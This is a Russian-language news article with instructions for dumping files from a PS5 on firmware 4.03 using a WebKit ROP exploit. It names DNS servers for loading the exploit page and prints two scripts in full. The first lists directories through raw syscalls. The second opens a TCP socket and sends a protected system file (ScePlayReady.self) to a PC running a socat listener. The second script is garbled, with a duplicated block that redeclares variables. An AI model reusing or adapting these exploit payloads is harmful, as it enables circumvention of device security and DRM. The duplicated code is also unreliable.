Взлом PS5: Скрипты для дампинга файловой системы на консолях с прошивкой 4.03

Взлом PS5: Скрипты для дампинга файловой системы на консолях с прошивкой 4.03

Для дампинга потребуется консоль PS5 только с версией прошивки 4.03, на других версиях способ не сработает.

image

Специализирующийся на взломе PlayStation хакер Bigboss опубликовал скрипты ROP (возвратно-ориентированного программирования) для перечисления и вывода данных из файловой системы PS5 с версией прошивки 4.03 с помощью webkit эксплоита. Конечно, получить весь дамп файлов не выйдет, а только файлы, доступные через разрешения webkit. Тем не менее, благодаря этому можно получить ясную картину файлов PS5.

Дампинг файловой системы PS5 с пошивкой 4.03. Инструкция

Наверное, это очевидно, но для дампинга потребуется консоль PS5 только с версией прошивки 4.03, на других версиях способ не сработает.

Необходимо будет модифицировать выполнение ROP в пользовательском пространстве. Эти файлы были выпущены ChendoChap и ZnullPtr некоторое время назад и доступны здесь .

После строчки 650 скрипта exploit.js (alert(`sys_getpid: ${pid}`);), скорее всего, потребуется удалить раздел образцов (Threading Sample и Branch Sample) и заменить их представленным ниже кодом от Bigboss.

Далее нужно сохранить полученные файлы на сервере и загрузить index.html через браузер PS5 (например, можно воспользоваться одним из DNS от Al-Azif: 165.227.83.145 или 192.241.221.79, получить доступ к странице с руководством для пользователя на PS5, а затем воспользоваться URL-переадресатором).

Скрипт для перечисления файлов и папок (также дает имя строке sandbox, полупроизвольное имя папки под конкретного пользователя):

let directory=malloc(256,1);
 p.writestr(directory.add32(0),"/");
 let retopen=await chain.syscall(5,directory,0,0);
 let directoryBuffer=malloc(1024*1024,1);
 let directorySize=1024*1024;
 let retgetdent=await chain.syscall(272,retopen,directoryBuffer,directorySize);
 let numbytes=parseInt(retgetdent,16);
 let entry;
 let num_entry=0; 
 let d_fileno;
 let d_reclen;
 let d_type;
 let d_namelen;
 let d_name;
 let position=0;
 for(position=0;position<numbytes;){ 
   entry=directoryBuffer.add32(position); 
   d_fileno=p.read4(entry.add32(0));   
   d_reclen=p.read2(entry.add32(4)); 
   d_type=p.read1(entry.add32(6));   
   d_namelen=p.read1(entry.add32(7)); 
   d_name=p.readstr(entry.add32(8));
   alert("num_entry=${num_entry} d_reclen=${d_reclen} d_type=${d_type} d_namelen=${d_namelen} d_name=${d_name} position=${position}");
    position=position+d_reclen;
    parseInt(position)+parseInt(d_reclen,16); 
    num_entry++; 
 } 

Скрипт для создания дампа файла в целевом файле на компьютере:

//POST EXPLOIT STUFF HERE
 //change once per file name
 //use for example in your pc socat -u TCP-LISTEN:18194,reuseaddr OPEN:ScePlayReady.self,creat,trunc
 let tcpsocket=await chain.syscall(97,2,1,0);
 alert(`sys_socket: ${tcpsocket}`);
 let tcpsocketaddr=malloc(16,1);
 p.write1(tcpsocketaddr.add32(1),2);
 p.write2(tcpsocketaddr.add32(2),0x1247);
 //change ip for your pc
 p.write4(tcpsocketaddr.add32(4),0xCD01A8C0); //192(C0)168(A8)1(01)205(CD)
 alert(`before sys_connect`);
 let ret_tcpconnect=await chain.syscall(98,tcpsocket,tcpsocketaddr,16);
 alert(`sys_connect: ${ret_tcpconnect}`);
 //the right way is to use stat get size but this is quick and dirty test
 let tcpmessage=malloc(34406400,1);
 let tcpmessage_size=34406400;
 let file=malloc(256,1);
 p.writestr(file.add32(0),"/RcDZV3xbd4/common/lib/ScePlayReady.self");//example path /RcDZV3xbd4/common/lib/ScePlayReady.self, change RcDZV3xbd4 to your sandbox string
 let retopen_file=await chain.syscall(5,file,0,0);
 alert(`syscall_open return ${retopen_file}\n`);
 let file_read=await chain.syscall(3,retopen_file,tcpmessage,tcpmessage_size);
 alert(`before sys_sendto read ${file_read}`);
 let ret_tcpsendto=await chain.syscall(133,tcpsocket,tcpmessage,file_read,0,0,0);
 alert(`sys_sendto: ${ret_tcpsendto} ${file_read}`);
 let ret_close=await chain.syscall(6,tcpsocket);
 alert(`sys_close: ${ret_close}`);
 alert(`syscall_open return ${retopen_file}\n`);
 let file_read=await chain.syscall(3,retopen_file,tcpmessage,tcpmessage_size);
 alert(`before sys_sendto read ${file_read}`);
 let ret_tcpsendto=await chain.syscall(133,tcpsocket,tcpmessage,file_read,0,0,0);
 alert(`sys_sendto: ${ret_tcpsendto} ${file_read}`);
 let ret_close=await chain.syscall(6,tcpsocket);
 alert(`sys_close: ${ret_close}`);
 //size used was for a self file
 //after all this your ScePlayReady.self file is created and closed

Конечно, энтузиасты, работающие над взломом PS5, уже наверняка получили файлы с помощью этого механизма (и, вероятно, смогли получить еще больше другими способами), но для тех, кто просто хочет посмотреть, как это делается, представленные выше скрипты являются самым простым способом.


Один хакер может причинить столько же вреда, сколько 10 000 солдат! Подпишись на наш Телеграм канал, чтобы узнать первым, как выжить в цифровом кошмаре!